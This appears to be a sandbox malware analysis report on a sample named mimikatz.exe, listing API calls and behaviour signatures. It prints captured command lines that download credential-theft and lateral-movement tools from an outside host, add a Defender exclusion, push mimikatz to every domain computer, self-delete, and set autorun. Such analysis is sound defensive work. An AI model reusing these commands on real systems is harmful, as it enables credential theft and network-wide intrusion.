NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02092000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02075000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0209c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02076000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02093000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02094000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02095000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02096000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02097000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02098000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02099000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

mimikatz.exe tried to sleep 169 seconds, actually delayed analysis time by 169 seconds

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (16 events)

cmdline	powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
cmdline	powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
cmdline	cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
cmdline	cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
cmdline	cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
cmdline	cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
cmdline	powershell -Command " $computers = Get-ADComputer -Filter * \| Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe && C:\WinXRAR\mimikatz.exe' } "
cmdline	powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
cmdline	cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
cmdline	powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
cmdline	cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
cmdline	powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
cmdline	cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
cmdline	cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
cmdline	powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
cmdline	powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\mimikatz.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Feb. 19, 2025, 10:36 a.m.	thread_identifier: 800 thread_handle: 0x00000100 process_identifier: 1404 current_directory: filepath: track: 1 command_line: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000104	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (45 events)

Time & API	Arguments	Status	Return
Process32FirstW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: [System Process] process_identifier: 0	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: System process_identifier: 4	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: smss.exe process_identifier: 224	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: csrss.exe process_identifier: 304	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: wininit.exe process_identifier: 352	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: csrss.exe process_identifier: 360	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: winlogon.exe process_identifier: 400	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: services.exe process_identifier: 444	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: lsass.exe process_identifier: 460	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: lsm.exe process_identifier: 468	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 572	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 652	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 724	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 784	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 832	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: audiodg.exe process_identifier: 900	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 992	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 292	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: spoolsv.exe process_identifier: 324	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 1048	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: srvany.exe process_identifier: 1284	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: KMService.exe process_identifier: 1436	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: conhost.exe process_identifier: 1448	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: taskhost.exe process_identifier: 1600	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: sppsvc.exe process_identifier: 1820	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: svchost.exe process_identifier: 1896	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: dwm.exe process_identifier: 1260	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: explorer.exe process_identifier: 1452	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: pw.exe process_identifier: 988	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: SearchIndexer.exe process_identifier: 1160	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: SearchProtocolHost.exe process_identifier: 936	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: SearchFilterHost.exe process_identifier: 2000	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: mobsync.exe process_identifier: 2276	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: pw.exe process_identifier: 2320	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: taskhost.exe process_identifier: 2364	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: mimikatz.exe process_identifier: 2556	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000ec process_name: cmd.exe process_identifier: 2980	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000ec process_name: conhost.exe process_identifier: 3016	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000ec process_name: powershell.exe process_identifier: 3040	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000104 process_name: cmd.exe process_identifier: 452	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000104 process_name: conhost.exe process_identifier: 908	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000104 process_name: powershell.exe process_identifier: 2984	1	1
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a4 process_name: taskhost.exe process_identifier: 2380	1	1
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464	1	1
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000e8 process_name: WmiPrvSE.exe process_identifier: 1216	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (9 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Feb. 19, 2025, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

pw.exe

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (26 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000084 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a8 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000ec process_name: powershell.exe process_identifier: 3040		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000104 process_name: powershell.exe process_identifier: 2984		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000108 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000108 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000108 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x00000108 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a4 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a4 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a4 process_name: mimikatz.exe process_identifier: 2556		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a4 process_name: taskhost.exe process_identifier: 2380		0	0
Process32NextW Feb. 19, 2025, 10:36 a.m.	snapshot_handle: 0x000000a4 process_name: taskhost.exe process_identifier: 2380		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: taskhost.exe process_identifier: 2380		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000a4 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000e8 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000e8 process_name: svchost.exe process_identifier: 2464		0	0
Process32NextW Feb. 19, 2025, 10:37 a.m.	snapshot_handle: 0x000000e8 process_name: WmiPrvSE.exe process_identifier: 1216		0	0

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
cmdline	cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
cmdline	powershell -Command " $computers = Get-ADComputer -Filter * \| Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe && C:\WinXRAR\mimikatz.exe' } "
cmdline	ping 1.1.1.1 -n 1 -w 3000
cmdline	cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\G5UTDSRESW

reg_value

"C:\Users\test22\AppData\Local\Temp\mimikatz.exe"

Creates a suspicious Powershell process (2 events)

option	-noninteractive				value	Prevents creating an interactive prompt for the user
option	-noninteractive				value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Generates some ICMP traffic

mimikatz.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All